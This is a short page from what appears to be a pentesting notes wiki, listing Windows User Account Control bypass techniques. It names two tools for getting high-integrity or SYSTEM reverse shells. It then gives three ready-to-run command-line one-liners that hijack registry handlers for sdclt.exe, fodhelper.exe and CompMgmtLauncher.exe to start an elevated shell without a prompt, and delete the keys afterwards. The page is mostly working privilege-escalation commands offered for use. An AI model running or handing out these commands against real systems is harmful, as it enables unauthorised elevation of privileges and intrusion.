UAC Bypass

From BHaFSec Pentesting Notes Wiki
Revision as of 14:25, 2 October 2017 by Illwill (talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting - x32 x64
TpmInitUACBypass Bypass User Account Control (UAC), to get a High Integrity (or SYSTEM) Reversed Command shell, a reversed PowerShell session, or a Reversed Meterpreter session.
TpmInitUACAnniversaryBypass Same as above, only works on Windows 10 x64 with the Anniversary Update applied (Version 1607).

UAC bypass for Win10 - control.exe

 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f